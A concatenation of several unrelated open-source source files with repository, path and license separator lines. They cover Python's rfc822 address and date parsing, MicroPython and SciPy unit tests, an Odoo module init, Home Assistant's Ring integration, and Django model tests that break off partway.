# XXX Should fix unquote() and quote() to be really conformant.
# XXX The inverses of the parse functions may also be useful.
def unquote(s):
"""Remove quotes from a string."""
if len(s) > 1:
if s.startswith('"') and s.endswith('"'):
return s[1:-1].replace('\\\\', '\\').replace('\\"', '"')
if s.startswith('<') and s.endswith('>'):
return s[1:-1]
return s
def quote(s):
"""Add quotes around a string."""
return s.replace('\\', '\\\\').replace('"', '\\"')
def parseaddr(address):
"""Parse an address into a (realname, mailaddr) tuple."""
a = AddressList(address)
lst = a.addresslist
if not lst:
return (None, None)
return lst[0]
class AddrlistClass:
"""Address parser class by Ben Escoto.
To understand what this class does, it helps to have a copy of
RFC 2822 in front of you.
http://www.faqs.org/rfcs/rfc2822.html
Note: this class interface is deprecated and may be removed in the future.
Use rfc822.AddressList instead.
"""
def __init__(self, field):
"""Initialize a new instance.
`field' is an unparsed address header field, containing one or more
addresses.
"""
self.specials = '()<>@,:;.\"[]'
self.pos = 0
self.LWS = ' \t'
self.CR = '\r\n'
self.atomends = self.specials + self.LWS + self.CR
# Note that RFC 2822 now specifies `.' as obs-phrase, meaning that it
# is obsolete syntax. RFC 2822 requires that we recognize obsolete
# syntax, so allow dots in phrases.
self.phraseends = self.atomends.replace('.', '')
self.field = field
self.commentlist = []
def gotonext(self):
"""Parse up to the start of the next address."""
while self.pos < len(self.field):
if self.field[self.pos] in self.LWS + '\n\r':
self.pos = self.pos + 1
elif self.field[self.pos] == '(':
self.commentlist.append(self.getcomment())
else: break
def getaddrlist(self):
"""Parse all addresses.
Returns a list containing all of the addresses.
"""
result = []
ad = self.getaddress()
while ad:
result += ad
ad = self.getaddress()
return result
def getaddress(self):
"""Parse the next address."""
self.commentlist = []
self.gotonext()
oldpos = self.pos
oldcl = self.commentlist
plist = self.getphraselist()
self.gotonext()
returnlist = []
if self.pos >= len(self.field):
# Bad email address technically, no domain.
if plist:
returnlist = [(' '.join(self.commentlist), plist[0])]
elif self.field[self.pos] in '.@':
# email address is just an addrspec
# this isn't very efficient since we start over
self.pos = oldpos
self.commentlist = oldcl
addrspec = self.getaddrspec()
returnlist = [(' '.join(self.commentlist), addrspec)]
elif self.field[self.pos] == ':':
# address is a group
returnlist = []
fieldlen = len(self.field)
self.pos += 1
while self.pos < len(self.field):
self.gotonext()
if self.pos < fieldlen and self.field[self.pos] == ';':
self.pos += 1
break
returnlist = returnlist + self.getaddress()
elif self.field[self.pos] == '<':
# Address is a phrase then a route addr
routeaddr = self.getrouteaddr()
if self.commentlist:
returnlist = [(' '.join(plist) + ' (' + \
' '.join(self.commentlist) + ')', routeaddr)]
else: returnlist = [(' '.join(plist), routeaddr)]
else:
if plist:
returnlist = [(' '.join(self.commentlist), plist[0])]
elif self.field[self.pos] in self.specials:
self.pos += 1
self.gotonext()
if self.pos < len(self.field) and self.field[self.pos] == ',':
self.pos += 1
return returnlist
def getrouteaddr(self):
"""Parse a route address (Return-path value).
This method just skips all the route stuff and returns the addrspec.
"""
if self.field[self.pos] != '<':
return
expectroute = 0
self.pos += 1
self.gotonext()
adlist = ""
while self.pos < len(self.field):
if expectroute:
self.getdomain()
expectroute = 0
elif self.field[self.pos] == '>':
self.pos += 1
break
elif self.field[self.pos] == '@':
self.pos += 1
expectroute = 1
elif self.field[self.pos] == ':':
self.pos += 1
else:
adlist = self.getaddrspec()
self.pos += 1
break
self.gotonext()
return adlist
def getaddrspec(self):
"""Parse an RFC 2822 addr-spec."""
aslist = []
self.gotonext()
while self.pos < len(self.field):
if self.field[self.pos] == '.':
aslist.append('.')
self.pos += 1
elif self.field[self.pos] == '"':
aslist.append('"%s"' % self.getquote())
elif self.field[self.pos] in self.atomends:
break
else: aslist.append(self.getatom())
self.gotonext()
if self.pos >= len(self.field) or self.field[self.pos] != '@':
return ''.join(aslist)
aslist.append('@')
self.pos += 1
self.gotonext()
return ''.join(aslist) + self.getdomain()
def getdomain(self):
"""Get the complete domain name from an address."""
sdlist = []
while self.pos < len(self.field):
if self.field[self.pos] in self.LWS:
self.pos += 1
elif self.field[self.pos] == '(':
self.commentlist.append(self.getcomment())
elif self.field[self.pos] == '[':
sdlist.append(self.getdomainliteral())
elif self.field[self.pos] == '.':
self.pos += 1
sdlist.append('.')
elif self.field[self.pos] in self.atomends:
break
else: sdlist.append(self.getatom())
return ''.join(sdlist)
def getdelimited(self, beginchar, endchars, allowcomments = 1):
"""Parse a header fragment delimited by special characters.
`beginchar' is the start character for the fragment. If self is not
looking at an instance of `beginchar' then getdelimited returns the
empty string.
`endchars' is a sequence of allowable end-delimiting characters.
Parsing stops when one of these is encountered.
If `allowcomments' is non-zero, embedded RFC 2822 comments are allowed
within the parsed fragment.
"""
if self.field[self.pos] != beginchar:
return ''
slist = ['']
quote = 0
self.pos += 1
while self.pos < len(self.field):
if quote == 1:
slist.append(self.field[self.pos])
quote = 0
elif self.field[self.pos] in endchars:
self.pos += 1
break
elif allowcomments and self.field[self.pos] == '(':
slist.append(self.getcomment())
continue # have already advanced pos from getcomment
elif self.field[self.pos] == '\\':
quote = 1
else:
slist.append(self.field[self.pos])
self.pos += 1
return ''.join(slist)
def getquote(self):
"""Get a quote-delimited fragment from self's field."""
return self.getdelimited('"', '"\r', 0)
def getcomment(self):
"""Get a parenthesis-delimited fragment from self's field."""
return self.getdelimited('(', ')\r', 1)
def getdomainliteral(self):
"""Parse an RFC 2822 domain-literal."""
return '[%s]' % self.getdelimited('[', ']\r', 0)
def getatom(self, atomends=None):
"""Parse an RFC 2822 atom.
Optional atomends specifies a different set of end token delimiters
(the default is to use self.atomends). This is used e.g. in
getphraselist() since phrase endings must not include the `.' (which
is legal in phrases)."""
atomlist = ['']
if atomends is None:
atomends = self.atomends
while self.pos < len(self.field):
if self.field[self.pos] in atomends:
break
else: atomlist.append(self.field[self.pos])
self.pos += 1
return ''.join(atomlist)
def getphraselist(self):
"""Parse a sequence of RFC 2822 phrases.
A phrase is a sequence of words, which are in turn either RFC 2822
atoms or quoted-strings. Phrases are canonicalized by squeezing all
runs of continuous whitespace into one space.
"""
plist = []
while self.pos < len(self.field):
if self.field[self.pos] in self.LWS:
self.pos += 1
elif self.field[self.pos] == '"':
plist.append(self.getquote())
elif self.field[self.pos] == '(':
self.commentlist.append(self.getcomment())
elif self.field[self.pos] in self.phraseends:
break
else:
plist.append(self.getatom(self.phraseends))
return plist
class AddressList(AddrlistClass):
"""An AddressList encapsulates a list of parsed RFC 2822 addresses."""
def __init__(self, field):
AddrlistClass.__init__(self, field)
if field:
self.addresslist = self.getaddrlist()
else:
self.addresslist = []
def __len__(self):
return len(self.addresslist)
def __str__(self):
return ", ".join(map(dump_address_pair, self.addresslist))
def __add__(self, other):
# Set union
newaddr = AddressList(None)
newaddr.addresslist = self.addresslist[:]
for x in other.addresslist:
if not x in self.addresslist:
newaddr.addresslist.append(x)
return newaddr
def __iadd__(self, other):
# Set union, in-place
for x in other.addresslist:
if not x in self.addresslist:
self.addresslist.append(x)
return self
def __sub__(self, other):
# Set difference
newaddr = AddressList(None)
for x in self.addresslist:
if not x in other.addresslist:
newaddr.addresslist.append(x)
return newaddr
def __isub__(self, other):
# Set difference, in-place
for x in other.addresslist:
if x in self.addresslist:
self.addresslist.remove(x)
return self
def __getitem__(self, index):
# Make indexing, slices, and 'in' work
return self.addresslist[index]
def dump_address_pair(pair):
"""Dump a (name, address) pair in a canonicalized form."""
if pair[0]:
return '"' + pair[0] + '" <' + pair[1] + '>'
else:
return pair[1]
# Parse a date field
_monthnames = ['jan', 'feb', 'mar', 'apr', 'may', 'jun', 'jul',
'aug', 'sep', 'oct', 'nov', 'dec',
'january', 'february', 'march', 'april', 'may', 'june', 'july',
'august', 'september', 'october', 'november', 'december']
_daynames = ['mon', 'tue', 'wed', 'thu', 'fri', 'sat', 'sun']
# The timezone table does not include the military time zones defined
# in RFC822, other than Z. According to RFC1123, the description in
# RFC822 gets the signs wrong, so we can't rely on any such time
# zones. RFC1123 recommends that numeric timezone indicators be used
# instead of timezone names.
_timezones = {'UT':0, 'UTC':0, 'GMT':0, 'Z':0,
'AST': -400, 'ADT': -300, # Atlantic (used in Canada)
'EST': -500, 'EDT': -400, # Eastern
'CST': -600, 'CDT': -500, # Central
'MST': -700, 'MDT': -600, # Mountain
'PST': -800, 'PDT': -700 # Pacific
}
def parsedate_tz(data):
"""Convert a date string to a time tuple.
Accounts for military timezones.
"""
if not data:
return None
data = data.split()
if data[0][-1] in (',', '.') or data[0].lower() in _daynames:
# There's a dayname here. Skip it
del data[0]
else:
# no space after the "weekday,"?
i = data[0].rfind(',')
if i >= 0:
data[0] = data[0][i+1:]
if len(data) == 3: # RFC 850 date, deprecated
stuff = data[0].split('-')
if len(stuff) == 3:
data = stuff + data[1:]
if len(data) == 4:
s = data[3]
i = s.find('+')
if i > 0:
data[3:] = [s[:i], s[i+1:]]
else:
data.append('') # Dummy tz
if len(data) < 5:
return None
data = data[:5]
[dd, mm, yy, tm, tz] = data
mm = mm.lower()
if not mm in _monthnames:
dd, mm = mm, dd.lower()
if not mm in _monthnames:
return None
mm = _monthnames.index(mm)+1
if mm > 12: mm = mm - 12
if dd[-1] == ',':
dd = dd[:-1]
i = yy.find(':')
if i > 0:
yy, tm = tm, yy
if yy[-1] == ',':
yy = yy[:-1]
if not yy[0].isdigit():
yy, tz = tz, yy
if tm[-1] == ',':
tm = tm[:-1]
tm = tm.split(':')
if len(tm) == 2:
[thh, tmm] = tm
tss = '0'
elif len(tm) == 3:
[thh, tmm, tss] = tm
else:
return None
try:
yy = int(yy)
dd = int(dd)
thh = int(thh)
tmm = int(tmm)
tss = int(tss)
except ValueError:
return None
tzoffset = None
tz = tz.upper()
if tz in _timezones:
tzoffset = _timezones[tz]
else:
try:
tzoffset = int(tz)
except ValueError:
pass
# Convert a timezone offset into seconds ; -0500 -> -18000
if tzoffset:
if tzoffset < 0:
tzsign = -1
tzoffset = -tzoffset
else:
tzsign = 1
tzoffset = tzsign * ( (tzoffset//100)*3600 + (tzoffset % 100)*60)
return (yy, mm, dd, thh, tmm, tss, 0, 1, 0, tzoffset)
def parsedate(data):
"""Convert a time string to a time tuple."""
t = parsedate_tz(data)
if t is None:
return t
return t[:9]
def mktime_tz(data):
"""Turn a 10-tuple as returned by parsedate_tz() into a UTC timestamp."""
if data[9] is None:
# No zone info, so localtime is better assumption than GMT
return time.mktime(data[:8] + (-1,))
else:
t = time.mktime(data[:8] + (0,))
return t - data[9] - time.timezone
def formatdate(timeval=None):
"""Returns time format preferred for Internet standards.
Sun, 06 Nov 1994 08:49:37 GMT ; RFC 822, updated by RFC 1123
According to RFC 1123, day and month names must always be in
English. If not for that, this code could use strftime(). It
can't because strftime() honors the locale and could generated
non-English names.
"""
if timeval is None:
timeval = time.time()
timeval = time.gmtime(timeval)
return "%s, %02d %s %04d %02d:%02d:%02d GMT" % (
("Mon", "Tue", "Wed", "Thu", "Fri", "Sat", "Sun")[timeval[6]],
timeval[2],
("Jan", "Feb", "Mar", "Apr", "May", "Jun",
"Jul", "Aug", "Sep", "Oct", "Nov", "Dec")[timeval[1]-1],
timeval[0], timeval[3], timeval[4], timeval[5])
# When used as script, run a small test program.
# The first command line argument must be a filename containing one
# message in RFC-822 format.
if __name__ == '__main__':
import sys, os
file = os.path.join(os.environ['HOME'], 'Mail/inbox/1')
if sys.argv[1:]: file = sys.argv[1]
f = open(file, 'r')
m = Message(f)
print 'From:', m.getaddr('from')
print 'To:', m.getaddrlist('to')
print 'Subject:', m.getheader('subject')
print 'Date:', m.getheader('date')
date = m.getdate_tz('date')
tz = date[-1]
date = time.localtime(mktime_tz(date))
if date:
print 'ParsedDate:', time.asctime(date),
hhmmss = tz
hhmm, ss = divmod(hhmmss, 60)
hh, mm = divmod(hhmm, 60)
print "%+03d%02d" % (hh, mm),
if ss: print ".%02d" % ss,
print
else:
print 'ParsedDate:', None
m.rewindbody()
n = 0
while f.readline():
n += 1
print 'Lines:', n
print '-'*70
print 'len =', len(m)
if 'Date' in m: print 'Date =', m['Date']
if 'X-Nonsense' in m: pass
print 'keys =', m.keys()
print 'values =', m.values()
print 'items =', m.items()
| gpl-3.0 |
martinribelotta/micropython | tests/basics/string_rsplit.py | 55 | 1413 | # default separator (whitespace)
print("a b".rsplit())
#print(" a b ".rsplit(None))
#print(" a b ".rsplit(None, 1))
#print(" a b ".rsplit(None, 2))
#print(" a b c ".rsplit(None, 1))
#print(" a b c ".rsplit(None, 0))
#print(" a b c ".rsplit(None, -1))
# empty separator should fail (this actually delegates to .split())
try:
"abc".rsplit('')
except ValueError:
print("ValueError")
# empty separator should fail (error handled in .rsplit())
try:
'a a a a'.rsplit('', 5)
except ValueError:
print('ValueError')
# bad separator type
try:
'a a a a'.rsplit(1)
except TypeError:
print('TypeError')
# non-empty separator
print("abc".rsplit("a"))
print("abc".rsplit("b"))
print("abc".rsplit("c"))
print("abc".rsplit("z"))
print("abc".rsplit("ab"))
print("abc".rsplit("bc"))
print("abc".rsplit("abc"))
print("abc".rsplit("abcd"))
print("abcabc".rsplit("bc"))
print("abcabc".rsplit("bc", 0))
print("abcabc".rsplit("bc", 1))
print("abcabc".rsplit("bc", 2))
print("10/11/12".rsplit("/", 1))
print("10/11/12".rsplit("/", 2))
print("10/11/12".rsplit("/", 3))
print("10/11/12".rsplit("/", 4))
print("10/11/12".rsplit("/", 5))
print("/*10/*11/*12/*".rsplit("/*", 1))
print("/*10/*11/*12/*".rsplit("/*", 2))
print("/*10/*11/*12/*".rsplit("/*", 3))
print("/*10/*11/*12/*".rsplit("/*", 4))
print("/*10/*11/*12/*".rsplit("/*", 5))
print(b"abcabc".rsplit(b"bc", 2))
| mit |
jsilter/scipy | scipy/special/tests/test_logit.py | 110 | 2925 | from __future__ import division, print_function, absolute_import
import numpy as np
from numpy.testing import (TestCase, assert_equal, assert_almost_equal,
assert_allclose)
from scipy.special import logit, expit
class TestLogit(TestCase):
def check_logit_out(self, dtype, expected):
a = np.linspace(0,1,10)
a = np.array(a, dtype=dtype)
olderr = np.seterr(divide='ignore')
try:
actual = logit(a)
finally:
np.seterr(**olderr)
assert_almost_equal(actual, expected)
assert_equal(actual.dtype, np.dtype(dtype))
def test_float32(self):
expected = np.array([-np.inf, -2.07944155,
-1.25276291, -0.69314718,
-0.22314353, 0.22314365,
0.6931473, 1.25276303,
2.07944155, np.inf], dtype=np.float32)
self.check_logit_out('f4', expected)
def test_float64(self):
expected = np.array([-np.inf, -2.07944154,
-1.25276297, -0.69314718,
-0.22314355, 0.22314355,
0.69314718, 1.25276297,
2.07944154, np.inf])
self.check_logit_out('f8', expected)
def test_nan(self):
expected = np.array([np.nan]*4)
olderr = np.seterr(invalid='ignore')
try:
actual = logit(np.array([-3., -2., 2., 3.]))
finally:
np.seterr(**olderr)
assert_equal(expected, actual)
class TestExpit(TestCase):
def check_expit_out(self, dtype, expected):
a = np.linspace(-4,4,10)
a = np.array(a, dtype=dtype)
actual = expit(a)
assert_almost_equal(actual, expected)
assert_equal(actual.dtype, np.dtype(dtype))
def test_float32(self):
expected = np.array([0.01798621, 0.04265125,
0.09777259, 0.20860852,
0.39068246, 0.60931754,
0.79139149, 0.9022274,
0.95734876, 0.98201376], dtype=np.float32)
self.check_expit_out('f4',expected)
def test_float64(self):
expected = np.array([0.01798621, 0.04265125,
0.0977726, 0.20860853,
0.39068246, 0.60931754,
0.79139147, 0.9022274,
0.95734875, 0.98201379])
self.check_expit_out('f8', expected)
def test_large(self):
for dtype in (np.float32, np.float64, np.longdouble):
for n in (88, 89, 709, 710, 11356, 11357):
n = np.array(n, dtype=dtype)
assert_allclose(expit(n), 1.0, atol=1e-20)
assert_allclose(expit(-n), 0.0, atol=1e-20)
assert_equal(expit(n).dtype, dtype)
assert_equal(expit(-n).dtype, dtype)
| bsd-3-clause |
fuselock/odoo | addons/hr_payroll/wizard/__init__.py | 442 | 1159 | #-*- coding:utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2009 Tiny SPRL (<http://tiny.be>). All Rights Reserved
# d$
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import hr_payroll_payslips_by_employees
import hr_payroll_contribution_register_report
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
turbokongen/home-assistant | homeassistant/components/ring/__init__.py | 9 | 9817 | """Support for Ring Doorbell/Chimes."""
import asyncio
from datetime import timedelta
from functools import partial
import logging
from pathlib import Path
from typing import Optional
from oauthlib.oauth2 import AccessDeniedError
import requests
from ring_doorbell import Auth, Ring
from homeassistant.const import __version__
from homeassistant.core import HomeAssistant, callback
from homeassistant.helpers.event import async_track_time_interval
from homeassistant.util.async_ import run_callback_threadsafe
_LOGGER = logging.getLogger(__name__)
ATTRIBUTION = "Data provided by Ring.com"
NOTIFICATION_ID = "ring_notification"
NOTIFICATION_TITLE = "Ring Setup"
DOMAIN = "ring"
DEFAULT_ENTITY_NAMESPACE = "ring"
PLATFORMS = ("binary_sensor", "light", "sensor", "switch", "camera")
async def async_setup(hass, config):
"""Set up the Ring component."""
if DOMAIN not in config:
return True
def legacy_cleanup():
"""Clean up old tokens."""
old_cache = Path(hass.config.path(".ring_cache.pickle"))
if old_cache.is_file():
old_cache.unlink()
await hass.async_add_executor_job(legacy_cleanup)
return True
async def async_setup_entry(hass, entry):
"""Set up a config entry."""
def token_updater(token):
"""Handle from sync context when token is updated."""
run_callback_threadsafe(
hass.loop,
partial(
hass.config_entries.async_update_entry,
entry,
data={**entry.data, "token": token},
),
).result()
auth = Auth(f"HomeAssistant/{__version__}", entry.data["token"], token_updater)
ring = Ring(auth)
try:
await hass.async_add_executor_job(ring.update_data)
except AccessDeniedError:
_LOGGER.error("Access token is no longer valid. Please set up Ring again")
return False
hass.data.setdefault(DOMAIN, {})[entry.entry_id] = {
"api": ring,
"devices": ring.devices(),
"device_data": GlobalDataUpdater(
hass, "device", entry.entry_id, ring, "update_devices", timedelta(minutes=1)
),
"dings_data": GlobalDataUpdater(
hass,
"active dings",
entry.entry_id,
ring,
"update_dings",
timedelta(seconds=5),
),
"history_data": DeviceDataUpdater(
hass,
"history",
entry.entry_id,
ring,
lambda device: device.history(limit=10),
timedelta(minutes=1),
),
"health_data": DeviceDataUpdater(
hass,
"health",
entry.entry_id,
ring,
lambda device: device.update_health_data(),
timedelta(minutes=1),
),
}
for component in PLATFORMS:
hass.async_create_task(
hass.config_entries.async_forward_entry_setup(entry, component)
)
if hass.services.has_service(DOMAIN, "update"):
return True
async def async_refresh_all(_):
"""Refresh all ring data."""
for info in hass.data[DOMAIN].values():
await info["device_data"].async_refresh_all()
await info["dings_data"].async_refresh_all()
await hass.async_add_executor_job(info["history_data"].refresh_all)
await hass.async_add_executor_job(info["health_data"].refresh_all)
# register service
hass.services.async_register(DOMAIN, "update", async_refresh_all)
return True
async def async_unload_entry(hass, entry):
"""Unload Ring entry."""
unload_ok = all(
await asyncio.gather(
*[
hass.config_entries.async_forward_entry_unload(entry, component)
for component in PLATFORMS
]
)
)
if not unload_ok:
return False
hass.data[DOMAIN].pop(entry.entry_id)
if len(hass.data[DOMAIN]) != 0:
return True
# Last entry unloaded, clean up service
hass.services.async_remove(DOMAIN, "update")
return True
class GlobalDataUpdater:
"""Data storage for single API endpoint."""
def __init__(
self,
hass: HomeAssistant,
data_type: str,
config_entry_id: str,
ring: Ring,
update_method: str,
update_interval: timedelta,
):
"""Initialize global data updater."""
self.hass = hass
self.data_type = data_type
self.config_entry_id = config_entry_id
self.ring = ring
self.update_method = update_method
self.update_interval = update_interval
self.listeners = []
self._unsub_interval = None
@callback
def async_add_listener(self, update_callback):
"""Listen for data updates."""
# This is the first listener, set up interval.
if not self.listeners:
self._unsub_interval = async_track_time_interval(
self.hass, self.async_refresh_all, self.update_interval
)
self.listeners.append(update_callback)
@callback
def async_remove_listener(self, update_callback):
"""Remove data update."""
self.listeners.remove(update_callback)
if not self.listeners:
self._unsub_interval()
self._unsub_interval = None
async def async_refresh_all(self, _now: Optional[int] = None) -> None:
"""Time to update."""
if not self.listeners:
return
try:
await self.hass.async_add_executor_job(
getattr(self.ring, self.update_method)
)
except AccessDeniedError:
_LOGGER.error("Ring access token is no longer valid. Set up Ring again")
await self.hass.config_entries.async_unload(self.config_entry_id)
return
except requests.Timeout:
_LOGGER.warning(
"Time out fetching Ring %s data",
self.data_type,
)
return
except requests.RequestException as err:
_LOGGER.warning(
"Error fetching Ring %s data: %s",
self.data_type,
err,
)
return
for update_callback in self.listeners:
update_callback()
class DeviceDataUpdater:
"""Data storage for device data."""
def __init__(
self,
hass: HomeAssistant,
data_type: str,
config_entry_id: str,
ring: Ring,
update_method: str,
update_interval: timedelta,
):
"""Initialize device data updater."""
self.data_type = data_type
self.hass = hass
self.config_entry_id = config_entry_id
self.ring = ring
self.update_method = update_method
self.update_interval = update_interval
self.devices = {}
self._unsub_interval = None
async def async_track_device(self, device, update_callback):
"""Track a device."""
if not self.devices:
self._unsub_interval = async_track_time_interval(
self.hass, self.refresh_all, self.update_interval
)
if device.device_id not in self.devices:
self.devices[device.device_id] = {
"device": device,
"update_callbacks": [update_callback],
"data": None,
}
# Store task so that other concurrent requests can wait for us to finish and
# data be available.
self.devices[device.device_id]["task"] = asyncio.current_task()
self.devices[device.device_id][
"data"
] = await self.hass.async_add_executor_job(self.update_method, device)
self.devices[device.device_id].pop("task")
else:
self.devices[device.device_id]["update_callbacks"].append(update_callback)
# If someone is currently fetching data as part of the initialization, wait for them
if "task" in self.devices[device.device_id]:
await self.devices[device.device_id]["task"]
update_callback(self.devices[device.device_id]["data"])
@callback
def async_untrack_device(self, device, update_callback):
"""Untrack a device."""
self.devices[device.device_id]["update_callbacks"].remove(update_callback)
if not self.devices[device.device_id]["update_callbacks"]:
self.devices.pop(device.device_id)
if not self.devices:
self._unsub_interval()
self._unsub_interval = None
def refresh_all(self, _=None):
"""Refresh all registered devices."""
for device_id, info in self.devices.items():
try:
data = info["data"] = self.update_method(info["device"])
except AccessDeniedError:
_LOGGER.error("Ring access token is no longer valid. Set up Ring again")
self.hass.add_job(
self.hass.config_entries.async_unload(self.config_entry_id)
)
return
except requests.Timeout:
_LOGGER.warning(
"Time out fetching Ring %s data for device %s",
self.data_type,
device_id,
)
continue
except requests.RequestException as err:
_LOGGER.warning(
"Error fetching Ring %s data for device %s: %s",
self.data_type,
device_id,
err,
)
continue
for update_callback in info["update_callbacks"]:
self.hass.loop.call_soon_threadsafe(update_callback, data)
| apache-2.0 |
akshaybabloo/gollahalli-com | gollahalli_cms/editor/tests/test_models.py | 1 | 26159 | import datetime
import os
import shutil
import unittest.mock as mock
from io import BytesIO
import pytz
from PIL import Image
from django.conf import settings
from django.core.files.uploadedfile import InMemoryUploadedFile
from django.core.files.uploadedfile import SimpleUploadedFile
from django.test import TestCase
from gollahalli_cms.editor.models import ContentModel, EducationModel, ProjectsModel, TutorialsModel, ExperienceModel, SkillsModel, \
SkillsContentModel, PublicationsModel, PublicationsContentModel, MetaContentModel
def mock_datetime_now():
"""
Date and time with timezone.
Returns
-------
datetime: datetime
Datetime object.
"""
return datetime.datetime(2013, 11, 20, 20, 8, 7, 127325, tzinfo=pytz.UTC)
def mock_date():
"""
Mocks date.
Returns
-------
datetime: datetime
Datetime object.
"""
return datetime.date(2013, 11, 20)
class ContentModelTest(TestCase):
"""
Test case for `ContentModel`
"""
@mock.patch('django.utils.timezone.now', mock_datetime_now)
def setUp(self):
"""
Sets up the `ContentModel` and mocks django `timezone`
"""
im = Image.new(mode='RGB', size=(200, 200)) # create a new image using PIL
im_io = BytesIO() # a BytesIO object for saving image
im.save(im_io, 'JPEG') # save the image to im_io
im_io.seek(0)
ContentModel.objects.create(ref_id=1,
website_name="Akshay Raj Gollahalli",
cv=SimpleUploadedFile('best_file_eva.txt',
'these are the file contents!'.encode('utf-8')),
bio="bio",
url="https://www.example.com",
first_name="Some name",
last_name="last name",
email_id="name@example.com",
github="https://www.github.com",
twitter="https://www.twitter.com",
linkedin="https://www.linkedin.com",
file=SimpleUploadedFile('content_model.txt',
'these are the file contents!'.encode('utf-8')),
image=InMemoryUploadedFile(im_io, None, 'content_model.jpg', 'image/jpeg', im_io,
None))
def test_model(self):
"""
Tests `ref_id`, `website_name`, `bio`, `url`, `first_name`, `last_name`, `email_id`, `github`, `twitter` and
`linkedin`.
"""
content = ContentModel.objects.get(ref_id=1)
self.assertEqual(content.ref_id, 1)
self.assertEqual(content.website_name, "Akshay Raj Gollahalli")
self.assertEqual(content.bio, "bio")
self.assertEqual(content.url, "https://www.example.com")
self.assertEqual(content.first_name, "Some name")
self.assertEqual(content.last_name, "last name")
self.assertEqual(content.email_id, "name@example.com")
self.assertEqual(content.github, "https://www.github.com")
self.assertEqual(content.twitter, "https://www.twitter.com")
self.assertEqual(content.linkedin, "https://www.linkedin.com")
def test_timedate(self):
"""
Tests `created` and `updated` date and time.
"""
content = ContentModel.objects.get(ref_id=1)
self.assertEqual(content.updated, mock_datetime_now())
def test_uploads(self):
"""
Tests file uploads of `cv`, `file`, and `image`
"""
content = ContentModel.objects.get(ref_id=1)
self.assertEqual(content.cv, content.cv.name)
self.assertEqual(content.file, content.file.name)
self.assertEqual(content.image, content.image.name)
def test_re_upload(self):
"""
Testing re-uploads for `cv`, `file`, and `image`
"""
im = Image.new(mode='RGB', size=(200, 200)) # create a new image using PIL
im_io = BytesIO() # a BytesIO object for saving image
im.save(im_io, 'JPEG') # save the image to im_io
im_io.seek(0)
ContentModel.objects.update(ref_id=1,
cv=SimpleUploadedFile('best_file_eva_1.txt',
'these are the file contents!'.encode('utf-8')),
file=SimpleUploadedFile('content_model_1.txt',
'these are the file contents!'.encode('utf-8')),
image=InMemoryUploadedFile(im_io, None, 'content_model_1.jpg', 'image/jpeg', im_io,
None))
content = ContentModel.objects.get(ref_id=1)
self.assertEqual(content.cv, content.cv.name)
self.assertEqual(content.file, content.file.name)
self.assertEqual(content.image, content.image.name)
def tearDown(self):
for file_object in os.listdir(settings.MEDIA_ROOT):
file_object_path = os.path.join(settings.MEDIA_ROOT, file_object)
if os.path.isfile(file_object_path):
os.unlink(file_object_path)
else:
shutil.rmtree(file_object_path)
class EducationModelTest(TestCase):
"""
Test case for `EducationModel`
"""
@mock.patch('django.utils.timezone.now', mock_datetime_now)
def setUp(self):
"""
Sets up the `EducationModel` and mocks django `timezone`
"""
im = Image.new(mode='RGB', size=(200, 200)) # create a new image using PIL
im_io = BytesIO() # a BytesIO object for saving image
im.save(im_io, 'JPEG') # save the image to im_io
im_io.seek(0)
model = ContentModel.objects.create(ref_id=1)
EducationModel.objects.create(id=1,
ref_id=model,
title="some title",
from_date=mock_date(),
to_date=mock_date(),
where="somewhere",
current=True,
file=SimpleUploadedFile('education_model.txt',
'these are the file contents!'.encode('utf-8')),
image=InMemoryUploadedFile(im_io, None, 'education_model.jpg', 'image/jpeg',
im_io,
None))
def test_model(self):
"""
Tests `id`, `title`, `from_date`, `to_date`, `where` and `current`.
"""
content = EducationModel.objects.get(id=1)
self.assertEqual(content.id, 1)
self.assertEqual(content.title, "some title")
self.assertEqual(content.from_date, mock_date())
self.assertEqual(content.to_date, mock_date())
self.assertEqual(content.where, "somewhere")
self.assertEqual(content.current, True)
def test_files(self):
"""
Tests `file` and `image`.
"""
content = EducationModel.objects.get(id=1)
self.assertEqual(content.file, content.file.name)
self.assertEqual(content.image, content.image.name)
def test_re_upload(self):
"""
Testing re-uploads for `file`, and `image`
"""
im = Image.new(mode='RGB', size=(200, 200)) # create a new image using PIL
im_io = BytesIO() # a BytesIO object for saving image
im.save(im_io, 'JPEG') # save the image to im_io
im_io.seek(0)
EducationModel.objects.update(id=1,
file=SimpleUploadedFile('education_model_1.txt',
'these are the file contents!'.encode('utf-8')),
image=InMemoryUploadedFile(im_io, None, 'education_model_1.jpg', 'image/jpeg',
im_io,
None))
content = EducationModel.objects.get(id=1)
self.assertEqual(content.file, content.file.name)
self.assertEqual(content.image, content.image.name)
def tearDown(self):
for file_object in os.listdir(settings.MEDIA_ROOT):
file_object_path = os.path.join(settings.MEDIA_ROOT, file_object)
if os.path.isfile(file_object_path):
os.unlink(file_object_path)
else:
shutil.rmtree(file_object_path)
class ProjectsModelTest(TestCase):
"""
Test case for `ProjectsModel`
"""
@mock.patch('django.utils.timezone.now', mock_datetime_now)
def setUp(self):
"""
Sets up the `ProjectsModel` and mocks django `timezone`
"""
im = Image.new(mode='RGB', size=(200, 200)) # create a new image using PIL
im_io = BytesIO() # a BytesIO object for saving image
im.save(im_io, 'JPEG') # save the image to im_io
im_io.seek(0)
model = ContentModel.objects.create(ref_id=1)
ProjectsModel.objects.create(id=1,
ref_id=model,
link="https://www.example.com",
title="some title",
category="some category",
long_description="very long description\n yes very long",
short_description="short description",
file=SimpleUploadedFile('project_model.txt',
'these are the file contents!'.encode('utf-8')),
image=InMemoryUploadedFile(im_io, None, 'project_model.jpg', 'image/jpeg',
im_io,
None))
def test_model(self):
"""
Tests `id`, `link`, `title`, `category`, `long_description`, and `short_description`
"""
content = ProjectsModel.objects.get(id=1)
self.assertEqual(content.id, 1)
self.assertEqual(content.link, "https://www.example.com")
self.assertEqual(content.title, "some title")
self.assertEqual(content.category, "some category")
self.assertEqual(content.long_description, "very long description\n yes very long")
self.assertEqual(content.short_description, "short description")
def test_files(self):
"""
